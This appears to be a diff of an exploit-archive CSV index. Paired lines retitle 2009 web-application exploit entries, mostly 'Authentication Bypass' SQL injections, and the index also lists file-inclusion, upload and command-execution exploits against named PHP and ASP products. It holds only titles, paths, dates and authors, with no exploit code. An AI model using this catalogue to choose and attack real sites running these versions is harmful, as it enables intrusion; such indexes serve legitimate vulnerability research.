7881,platforms/php/webapps/7881.txt,"Joomla! Component com_flashmagazinedeluxe - (mag_id) SQL Injection",2009-01-26,TurkGuvenligi,php,webapps,0
|
||||
7883,platforms/php/webapps/7883.txt,"OpenX 2.6.3 - (MAX_type) Local File Inclusion",2009-01-26,"Charlie Briggs",php,webapps,0
|
||||
7884,platforms/php/webapps/7884.txt,"Flax Article Manager 1.1 - Remote PHP Script Upload",2009-01-27,S.W.A.T.,php,webapps,0
|
||||
|
|
@ -20580,10 +20583,10 @@ id,file,description,date,author,platform,type,port
|
|||
7908,platforms/php/webapps/7908.txt,"Star Articles 6.0 - (admin.manage) Remote Contents Change",2009-01-29,ByALBAYX,php,webapps,0
|
||||
7909,platforms/php/webapps/7909.txt,"Coppermine Photo Gallery 1.4.19 - Remote File Upload",2009-01-29,"Michael Brooks",php,webapps,0
|
||||
7911,platforms/php/webapps/7911.txt,"GLPI 0.71.3 - Multiple SQL Injections Vulnerabilities",2009-01-29,Zigma,php,webapps,0
|
||||
7916,platforms/php/webapps/7916.txt,"Netartmedia Car Portal 1.0 - (Authentication Bypass) SQL Injection",2009-01-29,"Mehmet Ince",php,webapps,0
|
||||
7916,platforms/php/webapps/7916.txt,"Netartmedia Car Portal 1.0 - Authentication Bypass",2009-01-29,"Mehmet Ince",php,webapps,0
|
||||
7917,platforms/php/webapps/7917.php,"PLE CMS 1.0 Beta 4.2 - (login.php school) Blind SQL Injection",2009-01-29,darkjoker,php,webapps,0
|
||||
7922,platforms/php/webapps/7922.txt,"Pligg CMS 9.9.5 - Cross-Site Request Forgery / Protection Bypass / Captcha Bypass",2009-01-29,"Michael Brooks",php,webapps,0
|
||||
7924,platforms/asp/webapps/7924.txt,"SalesCart - (Authentication Bypass) SQL Injection",2009-01-30,ByALBAYX,asp,webapps,0
|
||||
7924,platforms/asp/webapps/7924.txt,"SalesCart - Authentication Bypass",2009-01-30,ByALBAYX,asp,webapps,0
|
||||
7925,platforms/php/webapps/7925.txt,"Revou Twitter Clone - Cross-Site Scripting / SQL Injection",2009-01-30,nuclear,php,webapps,0
|
||||
7927,platforms/php/webapps/7927.txt,"GNUBoard 4.31.04 - (09.01.30) Multiple Local+Remote Vulnerabilities",2009-01-30,make0day,php,webapps,0
|
||||
7930,platforms/php/webapps/7930.txt,"bpautosales 1.0.1 - Cross-Site Scripting / SQL Injection",2009-01-30,"Mehmet Ince",php,webapps,0
|
||||
|
|
@ -20593,8 +20596,8 @@ id,file,description,date,author,platform,type,port
|
|||
7936,platforms/php/webapps/7936.txt,"sma-db 0.3.12 - Remote File Inclusion / Cross-Site Scripting",2009-02-02,ahmadbady,php,webapps,0
|
||||
7938,platforms/php/webapps/7938.txt,"Flatnux 2009-01-27 - Cross-Site Scripting / Iframe Injection (PoC)",2009-02-02,"Alfons Luja",php,webapps,0
|
||||
7939,platforms/php/webapps/7939.txt,"AJA Portal 1.2 (Windows) - Local File Inclusion",2009-02-02,ahmadbady,php,webapps,0
|
||||
7940,platforms/php/webapps/7940.txt,"WholeHogSoftware Ware Support - (Authentication Bypass) SQL Injection",2009-02-02,ByALBAYX,php,webapps,0
|
||||
7941,platforms/php/webapps/7941.txt,"WholeHogSoftware Password Protect - (Authentication Bypass) SQL Injection",2009-02-02,ByALBAYX,php,webapps,0
|
||||
7940,platforms/php/webapps/7940.txt,"WholeHogSoftware Ware Support - Authentication Bypass",2009-02-02,ByALBAYX,php,webapps,0
|
||||
7941,platforms/php/webapps/7941.txt,"WholeHogSoftware Password Protect - Authentication Bypass",2009-02-02,ByALBAYX,php,webapps,0
|
||||
7944,platforms/php/webapps/7944.php,"phpBLASTER 1.0 RC1 - (blaster_user) Blind SQL Injection",2009-02-02,darkjoker,php,webapps,0
|
||||
7945,platforms/php/webapps/7945.php,"CMS Mini 0.2.2 - Remote Command Execution",2009-02-02,darkjoker,php,webapps,0
|
||||
7946,platforms/php/webapps/7946.txt,"sourdough 0.3.5 - Remote File Inclusion",2009-02-02,ahmadbady,php,webapps,0
|
||||
|
|
@ -20604,14 +20607,14 @@ id,file,description,date,author,platform,type,port
|
|||
18164,platforms/android/webapps/18164.php,"Google Android - 'content://' URI Multiple Information Disclosure Vulnerabilities",2011-11-28,"Thomas Cannon",android,webapps,0
|
||||
7951,platforms/php/webapps/7951.txt,"WholeHogSoftware Ware Support - Insecure Cookie Handling",2009-02-03,Stack,php,webapps,0
|
||||
7952,platforms/php/webapps/7952.txt,"WholeHogSoftware Password Protect - Insecure Cookie Handling",2009-02-03,Stack,php,webapps,0
|
||||
7953,platforms/php/webapps/7953.txt,"ClickCart 6.0 - (Authentication Bypass) SQL Injection",2009-02-03,R3d-D3V!L,php,webapps,0
|
||||
7953,platforms/php/webapps/7953.txt,"ClickCart 6.0 - Authentication Bypass",2009-02-03,R3d-D3V!L,php,webapps,0
|
||||
7954,platforms/php/webapps/7954.txt,"groone glinks 2.1 - Remote File Inclusion",2009-02-03,"k3vin mitnick",php,webapps,0
|
||||
7955,platforms/php/webapps/7955.txt,"groone's Guestbook 2.0 - Remote File Inclusion",2009-02-03,"k3vin mitnick",php,webapps,0
|
||||
7956,platforms/php/webapps/7956.txt,"Online Grades 3.2.4 - (Authentication Bypass) SQL Injection",2009-02-03,x0r,php,webapps,0
|
||||
7956,platforms/php/webapps/7956.txt,"Online Grades 3.2.4 - Authentication Bypass",2009-02-03,x0r,php,webapps,0
|
||||
7959,platforms/php/webapps/7959.txt,"Simple Machines Forum (SMF) - 'BBCode' Cookie Stealing",2009-02-03,Xianur0,php,webapps,0
|
||||
7960,platforms/php/webapps/7960.txt,"AJA Modules Rapidshare 1.0.0 - Arbitrary File Upload",2009-02-03,"Hussin X",php,webapps,0
|
||||
7961,platforms/php/webapps/7961.php,"WEBalbum 2.4b - (photo.php id) Blind SQL Injection",2009-02-03,"Mehmet Ince",php,webapps,0
|
||||
7963,platforms/asp/webapps/7963.txt,"MyDesing Sayac 2.0 - (Authentication Bypass) SQL Injection",2009-02-03,Kacak,asp,webapps,0
|
||||
7963,platforms/asp/webapps/7963.txt,"MyDesing Sayac 2.0 - Authentication Bypass",2009-02-03,Kacak,asp,webapps,0
|
||||
7964,platforms/php/webapps/7964.txt,"4Site CMS 2.6 - Multiple SQL Injections",2009-02-03,D.Mortalov,php,webapps,0
|
||||
7965,platforms/php/webapps/7965.txt,"technote 7.2 - Remote File Inclusion",2009-02-03,make0day,php,webapps,0
|
||||
7967,platforms/php/webapps/7967.pl,"TxtBlog 1.0 Alpha - Remote Command Execution",2009-02-03,Osirys,php,webapps,0
|
||||
|
|
@ -20660,9 +20663,9 @@ id,file,description,date,author,platform,type,port
|
|||
8030,platforms/php/webapps/8030.txt,"Papoo CMS 3.x - (pfadhier) Local File Inclusion",2009-02-10,SirGod,php,webapps,0
|
||||
8031,platforms/php/webapps/8031.pph,"q-news 2.0 - Remote Command Execution",2009-02-10,Fireshot,php,webapps,0
|
||||
8032,platforms/php/webapps/8032.txt,"Potato News 1.0.0 - (user) Local File Inclusion",2009-02-10,x0r,php,webapps,0
|
||||
8033,platforms/php/webapps/8033.txt,"AuthPhp 1.0 - (Authentication Bypass) SQL Injection",2009-02-10,x0r,php,webapps,0
|
||||
8034,platforms/php/webapps/8034.txt,"Mynews 0_10 - (Authentication Bypass) SQL Injection",2009-02-10,x0r,php,webapps,0
|
||||
8035,platforms/php/webapps/8035.txt,"BlueBird Pre-Release - (Authentication Bypass) SQL Injection",2009-02-10,x0r,php,webapps,0
|
||||
8033,platforms/php/webapps/8033.txt,"AuthPhp 1.0 - Authentication Bypass",2009-02-10,x0r,php,webapps,0
|
||||
8034,platforms/php/webapps/8034.txt,"Mynews 0_10 - Authentication Bypass",2009-02-10,x0r,php,webapps,0
|
||||
8035,platforms/php/webapps/8035.txt,"BlueBird Pre-Release - Authentication Bypass",2009-02-10,x0r,php,webapps,0
|
||||
8036,platforms/php/webapps/8036.pl,"Fluorine CMS 0.1 rc 1 - File Disclosure / SQL Injection / Command Execution",2009-02-10,Osirys,php,webapps,0
|
||||
8038,platforms/php/webapps/8038.py,"TYPO3 < 4.0.12/4.1.10/4.2.6 - (jumpUrl) Remote File Disclosure",2009-02-10,Lolek,php,webapps,0
|
||||
8039,platforms/php/webapps/8039.txt,"SkaDate Online 7 - Arbitrary File Upload",2009-02-11,ZoRLu,php,webapps,0
|
||||
|
|
@ -20688,7 +20691,7 @@ id,file,description,date,author,platform,type,port
|
|||
8065,platforms/asp/webapps/8065.txt,"SAS Hotel Management System - 'myhotel_info.asp' SQL Injection",2009-02-16,Darkb0x,asp,webapps,0
|
||||
8066,platforms/php/webapps/8066.txt,"YACS CMS 8.11 - update_trailer.php Remote File Inclusion",2009-02-16,ahmadbady,php,webapps,0
|
||||
8068,platforms/php/webapps/8068.txt,"ravennuke 2.3.0 - Multiple Vulnerabilities",2009-02-16,waraxe,php,webapps,0
|
||||
8069,platforms/php/webapps/8069.txt,"Grestul 1.x - Authentication Bypass (via Cookie SQL Injection)",2009-02-16,x0r,php,webapps,0
|
||||
8069,platforms/php/webapps/8069.txt,"Grestul 1.x - Authentication Bypass (Cookie SQL Injection)",2009-02-16,x0r,php,webapps,0
|
||||
8070,platforms/asp/webapps/8070.txt,"SAS Hotel Management System - Arbitrary File Upload",2009-02-17,ZoRLu,asp,webapps,0
|
||||
8071,platforms/php/webapps/8071.txt,"S-CMS 1.1 Stable - Insecure Cookie Handling / Mass Page Delete Vulnerabilities",2009-02-17,x0r,php,webapps,0
|
||||
8072,platforms/php/webapps/8072.txt,"pHNews Alpha 1 - 'header.php mod' SQL Injection",2009-02-17,x0r,php,webapps,0
|
||||
|
|
@ -20707,10 +20710,10 @@ id,file,description,date,author,platform,type,port
|
|||
8095,platforms/php/webapps/8095.pl,"Pyrophobia 2.1.3.1 - Local File Inclusion Command Execution",2009-02-23,Osirys,php,webapps,0
|
||||
8098,platforms/php/webapps/8098.txt,"taifajobs 1.0 - (jobid) SQL Injection",2009-02-23,K-159,php,webapps,0
|
||||
8100,platforms/php/webapps/8100.pl,"MDPro Module My_eGallery - 'pid' SQL Injection",2009-02-23,StAkeR,php,webapps,0
|
||||
8101,platforms/php/webapps/8101.txt,"XGuestBook 2.0 - (Authentication Bypass) SQL Injection",2009-02-24,Fireshot,php,webapps,0
|
||||
8101,platforms/php/webapps/8101.txt,"XGuestBook 2.0 - Authentication Bypass",2009-02-24,Fireshot,php,webapps,0
|
||||
8104,platforms/php/webapps/8104.txt,"Qwerty CMS - 'id' SQL Injection",2009-02-24,b3,php,webapps,0
|
||||
8105,platforms/php/webapps/8105.txt,"pPIM 1.0 - Multiple Vulnerabilities",2009-02-25,"Justin Keane",php,webapps,0
|
||||
8107,platforms/asp/webapps/8107.txt,"PenPal 2.0 - (Authentication Bypass) SQL Injection",2009-02-25,ByALBAYX,asp,webapps,0
|
||||
8107,platforms/asp/webapps/8107.txt,"PenPal 2.0 - Authentication Bypass",2009-02-25,ByALBAYX,asp,webapps,0
|
||||
8109,platforms/asp/webapps/8109.txt,"SkyPortal Classifieds System 0.12 - Contents Change",2009-02-25,ByALBAYX,asp,webapps,0
|
||||
8110,platforms/asp/webapps/8110.txt,"SkyPortal Picture Manager 0.11 - Contents Change",2009-02-25,ByALBAYX,asp,webapps,0
|
||||
8111,platforms/asp/webapps/8111.txt,"SkyPortal WebLinks 0.12 - Contents Change",2009-02-25,ByALBAYX,asp,webapps,0
|
||||
|
|
@ -20718,7 +20721,7 @@ id,file,description,date,author,platform,type,port
|
|||
8113,platforms/asp/webapps/8113.txt,"DesignerfreeSolutions NewsLetter Manager Pro - Authentication Bypass",2009-02-26,ByALBAYX,asp,webapps,0
|
||||
8114,platforms/php/webapps/8114.txt,"Coppermine Photo Gallery 1.4.20 - (BBCode IMG) Privilege Escalation",2009-02-26,StAkeR,php,webapps,0
|
||||
8115,platforms/php/webapps/8115.pl,"Coppermine Photo Gallery 1.4.20 - (IMG) Privilege Escalation",2009-02-26,Inphex,php,webapps,0
|
||||
8116,platforms/php/webapps/8116.txt,"BannerManager 0.81 - (Authentication Bypass) SQL Injection",2009-02-26,rootzig,php,webapps,0
|
||||
8116,platforms/php/webapps/8116.txt,"BannerManager 0.81 - Authentication Bypass",2009-02-26,rootzig,php,webapps,0
|
||||
8120,platforms/asp/webapps/8120.txt,"SkyPortal Downloads Manager 1.1 - Remote Contents Change",2009-02-27,ByALBAYX,asp,webapps,0
|
||||
8123,platforms/php/webapps/8123.txt,"irokez blog 0.7.3.2 - Cross-Site Scripting / Remote File Inclusion / Blind SQL Injection",2009-02-27,Corwin,php,webapps,0
|
||||
8124,platforms/php/webapps/8124.txt,"Demium CMS 0.2.1b - Multiple Vulnerabilities",2009-02-27,Osirys,php,webapps,0
|
||||
|
|
@ -20793,7 +20796,7 @@ id,file,description,date,author,platform,type,port
|
|||
8290,platforms/php/webapps/8290.txt,"blogplus 1.0 - Multiple Local File Inclusion",2009-03-26,ahmadbady,php,webapps,0
|
||||
8291,platforms/php/webapps/8291.txt,"acute control panel 1.0.0 - SQL Injection / Remote File Inclusion",2009-03-26,SirGod,php,webapps,0
|
||||
8292,platforms/php/webapps/8292.txt,"Simply Classified 0.2 - (category_id) SQL Injection",2009-03-27,G4N0K,php,webapps,0
|
||||
8293,platforms/php/webapps/8293.txt,"Free PHP Petition Signing Script - (Authentication Bypass) SQL Injection",2009-03-27,Qabandi,php,webapps,0
|
||||
8293,platforms/php/webapps/8293.txt,"Free PHP Petition Signing Script - Authentication Bypass",2009-03-27,Qabandi,php,webapps,0
|
||||
8296,platforms/php/webapps/8296.txt,"Arcadwy Arcade Script - 'Username' Static Cross-Site Scripting",2009-03-27,"Anarchy Angel",php,webapps,0
|
||||
8297,platforms/php/webapps/8297.txt,"Moodle < 1.6.9/1.7.7/1.8.9/1.9.5 - File Disclosure",2009-03-27,"Christian J. Eibl",php,webapps,0
|
||||
8298,platforms/php/webapps/8298.pl,"My Simple Forum 7.1 - Remote Command Execution",2009-03-27,Osirys,php,webapps,0
|
||||
|
|
@ -20838,10 +20841,10 @@ id,file,description,date,author,platform,type,port
|
|||
8376,platforms/php/webapps/8376.php,"Geeklog 1.5.2 - SEC_authenticate() SQL Injection",2009-04-09,Nine:Situations:Group,php,webapps,0
|
||||
8377,platforms/asp/webapps/8377.pl,"Exjune Guestbook 2.0 - Remote Database Disclosure",2009-04-09,AlpHaNiX,asp,webapps,0
|
||||
8379,platforms/asp/webapps/8379.txt,"Back-End CMS 5.0 - (main.asp id) SQL Injection",2009-04-09,AnGeL25dZ,asp,webapps,0
|
||||
8380,platforms/php/webapps/8380.txt,"Simbas CMS 2.0 - (Authentication Bypass) SQL Injection",2009-04-09,"ThE g0bL!N",php,webapps,0
|
||||
8382,platforms/php/webapps/8382.txt,"WebFileExplorer 3.1 - (Authentication Bypass) SQL Injection",2009-04-09,Osirys,php,webapps,0
|
||||
8380,platforms/php/webapps/8380.txt,"Simbas CMS 2.0 - Authentication Bypass",2009-04-09,"ThE g0bL!N",php,webapps,0
|
||||
8382,platforms/php/webapps/8382.txt,"WebFileExplorer 3.1 - Authentication Bypass",2009-04-09,Osirys,php,webapps,0
|
||||
8383,platforms/php/webapps/8383.txt,"adaptbb 1.0b - Multiple Vulnerabilities",2009-04-09,"Salvatore Fresta",php,webapps,0
|
||||
8385,platforms/php/webapps/8385.txt,"My Dealer CMS 2.0 - (Authentication Bypass) SQL Injection",2009-04-09,"ThE g0bL!N",php,webapps,0
|
||||
8385,platforms/php/webapps/8385.txt,"My Dealer CMS 2.0 - Authentication Bypass",2009-04-09,"ThE g0bL!N",php,webapps,0
|
||||
8386,platforms/php/webapps/8386.txt,"Absolute Form Processor XE-V 1.5 - Authentication Bypass",2009-04-09,"ThE g0bL!N",php,webapps,0
|
||||
8387,platforms/php/webapps/8387.txt,"dynamic flash forum 1.0 Beta - Multiple Vulnerabilities",2009-04-09,"Salvatore Fresta",php,webapps,0
|
||||
8388,platforms/php/webapps/8388.txt,"PHP-Agenda 2.2.5 - Remote File Overwriting",2009-04-10,"Salvatore Fresta",php,webapps,0
|
||||
|
|
@ -20853,7 +20856,7 @@ id,file,description,date,author,platform,type,port
|
|||
8399,platforms/php/webapps/8399.pl,"Flatnuke 2.7.1 - (level) Privilege Escalation",2009-04-13,StAkeR,php,webapps,0
|
||||
8408,platforms/php/webapps/8408.txt,"X10media Mp3 Search Engine < 1.6.2 - Admin Access",2009-04-13,THUNDER,php,webapps,0
|
||||
8409,platforms/php/webapps/8409.txt,"Yellow Duck Weblog 2.1.0 - 'lang' Local File Inclusion",2009-04-13,ahmadbady,php,webapps,0
|
||||
8414,platforms/php/webapps/8414.txt,"XEngineSoft PMS/MGS/NM/Ams 1.0 - (Authentication Bypass) SQL Injection",2009-04-13,Dr-HTmL,php,webapps,0
|
||||
8414,platforms/php/webapps/8414.txt,"XEngineSoft PMS/MGS/NM/Ams 1.0 - Authentication Bypass",2009-04-13,Dr-HTmL,php,webapps,0
|
||||
8415,platforms/php/webapps/8415.txt,"FreznoShop 1.3.0 - 'id' SQL Injection",2009-04-13,NoGe,php,webapps,0
|
||||
8417,platforms/php/webapps/8417.txt,"e107 Plugin userjournals_menu - 'blog.id' SQL Injection",2009-04-13,boom3rang,php,webapps,0
|
||||
8418,platforms/php/webapps/8418.pl,"ASP Product Catalog 1.0 - (Cross-Site Scripting / File Disclosure) Multiple Remote Exploits",2009-04-13,AlpHaNiX,php,webapps,0
|
||||
|
|
@ -20874,7 +20877,7 @@ id,file,description,date,author,platform,type,port
|
|||
8443,platforms/php/webapps/8443.txt,"Job2C 4.2 - (adtype) Local File Inclusion",2009-04-15,ZoRLu,php,webapps,0
|
||||
8446,platforms/php/webapps/8446.txt,"FreeWebShop.org 2.2.9 RC2 - (lang_file) Local File Inclusion",2009-04-15,ahmadbady,php,webapps,0
|
||||
8448,platforms/php/webapps/8448.php,"Geeklog 1.5.2 - savepreferences()/*blocks[] SQL Injection",2009-04-16,Nine:Situations:Group,php,webapps,0
|
||||
8449,platforms/php/webapps/8449.txt,"NetHoteles 2.0/3.0 - (Authentication Bypass) SQL Injection",2009-04-16,Dns-Team,php,webapps,0
|
||||
8449,platforms/php/webapps/8449.txt,"NetHoteles 2.0/3.0 - Authentication Bypass",2009-04-16,Dns-Team,php,webapps,0
|
||||
8450,platforms/php/webapps/8450.txt,"Online Password Manager 4.1 - Insecure Cookie Handling",2009-04-16,ZoRLu,php,webapps,0
|
||||
8453,platforms/php/webapps/8453.txt,"webSPELL 4.2.0c - Bypass BBCode Cross-Site Scripting Cookie Stealing",2009-04-16,YEnH4ckEr,php,webapps,0
|
||||
8454,platforms/php/webapps/8454.txt,"DNS Tools (PHP Digger) - Remote Command Execution",2009-04-16,SirGod,php,webapps,0
|
||||
|
|
@ -20883,21 +20886,21 @@ id,file,description,date,author,platform,type,port
|
|||
8459,platforms/php/webapps/8459.htm,"eLitius 1.0 - (manage-admin.php) Add Admin/Change Password Exploit",2009-04-16,"ThE g0bL!N",php,webapps,0
|
||||
8460,platforms/php/webapps/8460.txt,"SMA-DB 0.3.13 - Multiple Remote File Inclusion",2009-04-16,JosS,php,webapps,0
|
||||
8461,platforms/php/webapps/8461.txt,"chCounter 3.1.3 - (Login Bypass) SQL Injection",2009-04-16,tmh,php,webapps,0
|
||||
8464,platforms/php/webapps/8464.txt,"Tiny Blogr 1.0.0 rc4 - (Authentication Bypass) SQL Injection",2009-04-17,"Salvatore Fresta",php,webapps,0
|
||||
8464,platforms/php/webapps/8464.txt,"Tiny Blogr 1.0.0 rc4 - Authentication Bypass",2009-04-17,"Salvatore Fresta",php,webapps,0
|
||||
8468,platforms/php/webapps/8468.txt,"Limbo CMS 1.0.4.2 - Cross-Site Request Forgery / Privilege Escalation (PoC)",2009-04-17,"Alfons Luja",php,webapps,0
|
||||
8471,platforms/php/webapps/8471.txt,"ClanTiger < 1.1.1 - Multiple Cookie Handling Vulnerabilities",2009-04-17,YEnH4ckEr,php,webapps,0
|
||||
8472,platforms/php/webapps/8472.txt,"ClanTiger 1.1.1 - (Authentication Bypass) SQL Injection",2009-04-17,YEnH4ckEr,php,webapps,0
|
||||
8472,platforms/php/webapps/8472.txt,"ClanTiger 1.1.1 - Authentication Bypass",2009-04-17,YEnH4ckEr,php,webapps,0
|
||||
8473,platforms/php/webapps/8473.pl,"ClanTiger 1.1.1 - (slug) Blind SQL Injection",2009-04-17,YEnH4ckEr,php,webapps,0
|
||||
8474,platforms/php/webapps/8474.txt,"e-cart.biz Shopping Cart - Arbitrary File Upload",2009-04-17,ahmadbady,php,webapps,0
|
||||
8475,platforms/php/webapps/8475.txt,"Esoftpro Online Guestbook Pro - (display) Blind SQL Injection",2009-04-17,"Hussin X",php,webapps,0
|
||||
8476,platforms/php/webapps/8476.txt,"Online Email Manager - Insecure Cookie Handling",2009-04-17,"Hussin X",php,webapps,0
|
||||
8477,platforms/php/webapps/8477.txt,"Hot Project 7.0 - (Authentication Bypass) SQL Injection",2009-04-17,HCOCA_MAN,php,webapps,0
|
||||
8477,platforms/php/webapps/8477.txt,"Hot Project 7.0 - Authentication Bypass",2009-04-17,HCOCA_MAN,php,webapps,0
|
||||
8480,platforms/php/webapps/8480.txt,"multi-lingual E-Commerce system 0.2 - Multiple Vulnerabilities",2009-04-20,"Salvatore Fresta",php,webapps,0
|
||||
8481,platforms/php/webapps/8481.txt,"Studio Lounge Address Book 2.5 - (profile) Arbitrary File Upload",2009-04-20,JosS,php,webapps,0
|
||||
8482,platforms/php/webapps/8482.txt,"Seditio CMS Events Plugin - (c) SQL Injection",2009-04-20,OoN_Boy,php,webapps,0
|
||||
8483,platforms/php/webapps/8483.txt,"Flatnux 2009-03-27 - Arbitrary File Upload / Information Disclosure",2009-04-20,girex,php,webapps,0
|
||||
8486,platforms/php/webapps/8486.txt,"webClassifieds 2005 - (Authentication Bypass) Insecure Cookie Handling",2009-04-20,"ThE g0bL!N",php,webapps,0
|
||||
8487,platforms/php/webapps/8487.txt,"EZ Webitor - (Authentication Bypass) SQL Injection",2009-04-20,snakespc,php,webapps,0
|
||||
8487,platforms/php/webapps/8487.txt,"EZ Webitor - Authentication Bypass",2009-04-20,snakespc,php,webapps,0
|
||||
8488,platforms/php/webapps/8488.pl,"Pligg CMS 9.9.0 - 'editlink.php' Blind SQL Injection",2009-04-20,"Rohit Bansal",php,webapps,0
|
||||
8491,platforms/php/webapps/8491.pl,"WysGui CMS 1.2b - (Insecure Cookie Handling) Blind SQL Injection",2009-04-20,YEnH4ckEr,php,webapps,0
|
||||
8492,platforms/php/webapps/8492.txt,"WB News 2.1.2 - Insecure Cookie Handling",2009-04-20,"ThE g0bL!N",php,webapps,0
|
||||
|
|
@ -20905,7 +20908,7 @@ id,file,description,date,author,platform,type,port
|
|||
8494,platforms/php/webapps/8494.txt,"TotalCalendar 2.4 - (inc_dir) Remote File Inclusion",2009-04-20,DarKdewiL,php,webapps,0
|
||||
8495,platforms/php/webapps/8495.pl,"e107 <= 0.7.15 - (extended_user_fields) Blind SQL Injection",2009-04-20,StAkeR,php,webapps,0
|
||||
8496,platforms/php/webapps/8496.htm,"TotalCalendar 2.4 - Remote Password Change Exploit",2009-04-20,"ThE g0bL!N",php,webapps,0
|
||||
8497,platforms/php/webapps/8497.txt,"Creasito E-Commerce 1.3.16 - (Authentication Bypass) SQL Injection",2009-04-20,"Salvatore Fresta",php,webapps,0
|
||||
8497,platforms/php/webapps/8497.txt,"Creasito E-Commerce 1.3.16 - Authentication Bypass",2009-04-20,"Salvatore Fresta",php,webapps,0
|
||||
8498,platforms/php/webapps/8498.txt,"eLitius 1.0 - Arbitrary Database Backup",2009-04-20,"ThE g0bL!N",php,webapps,0
|
||||
8499,platforms/php/webapps/8499.php,"Dokeos Lms 1.8.5 - (whoisonline.php) PHP Code Injection",2009-04-21,EgiX,php,webapps,0
|
||||
8501,platforms/php/webapps/8501.txt,"CRE Loaded 6.2 - (products_id) SQL Injection",2009-04-21,Player,php,webapps,0
|
||||
|
|
@ -20914,12 +20917,12 @@ id,file,description,date,author,platform,type,port
|
|||
8504,platforms/php/webapps/8504.txt,"NotFTP 1.3.1 - (newlang) Local File Inclusion",2009-04-21,Kacper,php,webapps,0
|
||||
8505,platforms/php/webapps/8505.txt,"Quick.CMS.Lite 0.5 - 'id' SQL Injection",2009-04-21,Player,php,webapps,0
|
||||
8506,platforms/php/webapps/8506.txt,"VS PANEL 7.3.6 - (Cat_ID) SQL Injection",2009-04-21,Player,php,webapps,0
|
||||
8508,platforms/php/webapps/8508.txt,"I-Rater Pro/Plantinum 4.0 - (Authentication Bypass) SQL Injection",2009-04-21,Hakxer,php,webapps,0
|
||||
8508,platforms/php/webapps/8508.txt,"I-Rater Pro/Plantinum 4.0 - Authentication Bypass",2009-04-21,Hakxer,php,webapps,0
|
||||
8509,platforms/php/webapps/8509.txt,"Studio Lounge Address Book 2.5 - Authentication Bypass",2009-04-21,"ThE g0bL!N",php,webapps,0
|
||||
8510,platforms/php/webapps/8510.txt,"mixedcms 1.0b - Local File Inclusion / Arbitrary File Upload / Authentication Bypass / File Disclosure",2009-04-21,YEnH4ckEr,php,webapps,0
|
||||
8513,platforms/php/webapps/8513.pl,"Dokeos Lms 1.8.5 - 'Include' Remote Code Execution",2009-04-22,StAkeR,php,webapps,0
|
||||
8514,platforms/php/webapps/8514.txt,"Elkagroup Image Gallery 1.0 - Arbitrary File Upload",2009-04-22,Securitylab.ir,php,webapps,0
|
||||
8515,platforms/php/webapps/8515.txt,"5 star Rating 1.2 - (Authentication Bypass) SQL Injection",2009-04-22,zer0day,php,webapps,0
|
||||
8515,platforms/php/webapps/8515.txt,"5 star Rating 1.2 - Authentication Bypass",2009-04-22,zer0day,php,webapps,0
|
||||
8516,platforms/php/webapps/8516.txt,"WebPortal CMS 0.8b - Multiple Remote / Local File Inclusion",2009-04-22,ahmadbady,php,webapps,0
|
||||
8517,platforms/php/webapps/8517.txt,"Joomla! Component rsmonials - Cross-Site Scripting",2009-04-22,jdc,php,webapps,0
|
||||
8521,platforms/php/webapps/8521.txt,"fowlcms 1.1 - Authentication Bypass / Local File Inclusion / Arbitrary File Upload",2009-04-23,YEnH4ckEr,php,webapps,0
|
||||
|
|
@ -20947,7 +20950,7 @@ id,file,description,date,author,platform,type,port
|
|||
8565,platforms/php/webapps/8565.txt,"ProjectCMS 1.0b - (index.php sn) SQL Injection",2009-04-29,YEnH4ckEr,php,webapps,0
|
||||
8566,platforms/php/webapps/8566.txt,"S-CMS 1.1 Stable - (page) Local File Inclusion",2009-04-29,ZoRLu,php,webapps,0
|
||||
8567,platforms/php/webapps/8567.txt,"Zubrag Smart File Download 1.3 - Arbitrary File Download",2009-04-29,Aodrulez,php,webapps,0
|
||||
8571,platforms/php/webapps/8571.txt,"Tiger Dms - (Authentication Bypass) SQL Injection",2009-04-29,"ThE g0bL!N",php,webapps,0
|
||||
8571,platforms/php/webapps/8571.txt,"Tiger Dms - Authentication Bypass",2009-04-29,"ThE g0bL!N",php,webapps,0
|
||||
8576,platforms/php/webapps/8576.pl,"Leap CMS 0.1.4 - (searchterm) Blind SQL Injection",2009-04-30,YEnH4ckEr,php,webapps,0
|
||||
8577,platforms/php/webapps/8577.txt,"Leap CMS 0.1.4 - SQL Injection / Cross-Site Scripting / Arbitrary File Upload",2009-04-30,YEnH4ckEr,php,webapps,0
|
||||
8585,platforms/php/webapps/8585.txt,"Golabi CMS 1.0.1 - Session Poisoning",2009-05-01,CrazyAngel,php,webapps,0
|
||||
|
|
@ -20975,9 +20978,9 @@ id,file,description,date,author,platform,type,port
|
|||
8636,platforms/php/webapps/8636.txt,"ST-Gallery 0.1a - Multiple SQL Injections",2009-05-07,YEnH4ckEr,php,webapps,0
|
||||
8638,platforms/php/webapps/8638.htm,"Simple Customer 1.3 - Arbitrary Change Admin Password",2009-05-07,ahmadbady,php,webapps,0
|
||||
8639,platforms/php/webapps/8639.htm,"Job Script 2.0 - Arbitrary Change Admin Password",2009-05-07,TiGeR-Dz,php,webapps,0
|
||||
8642,platforms/php/webapps/8642.txt,"The Recipe Script 5 - (Authentication Bypass) SQL Injection / DB Backup",2009-05-08,TiGeR-Dz,php,webapps,0
|
||||
8643,platforms/php/webapps/8643.txt,"Realty Web-Base 1.0 - (Authentication Bypass) SQL Injection",2009-05-08,"ThE g0bL!N",php,webapps,0
|
||||
8645,platforms/php/webapps/8645.txt,"Luxbum 0.5.5/stable - (Authentication Bypass) SQL Injection",2009-05-08,knxone,php,webapps,0
|
||||
8642,platforms/php/webapps/8642.txt,"The Recipe Script 5 - (Authentication Bypass) SQL Injection / Database Backup",2009-05-08,TiGeR-Dz,php,webapps,0
|
||||
8643,platforms/php/webapps/8643.txt,"Realty Web-Base 1.0 - Authentication Bypass",2009-05-08,"ThE g0bL!N",php,webapps,0
|
||||
8645,platforms/php/webapps/8645.txt,"Luxbum 0.5.5/stable - Authentication Bypass",2009-05-08,knxone,php,webapps,0
|
||||
8647,platforms/php/webapps/8647.txt,"Battle Blog 1.25 - 'uploadform.asp' Arbitrary File Upload",2009-05-08,Cyber-Zone,php,webapps,0
|
||||
8648,platforms/php/webapps/8648.pl,"RTWebalbum 1.0.462 - 'albumID' Blind SQL Injection",2009-05-08,YEnH4ckEr,php,webapps,0
|
||||
8649,platforms/php/webapps/8649.php,"TinyWebGallery 1.7.6 - Local File Inclusion / Remote Code Execution",2009-05-08,EgiX,php,webapps,0
|
||||
|
|
@ -20994,12 +20997,12 @@ id,file,description,date,author,platform,type,port
|
|||
8672,platforms/php/webapps/8672.php,"MaxCMS 2.0 - (m_username) Arbitrary Create Admin Exploit",2009-05-13,Securitylab.ir,php,webapps,0
|
||||
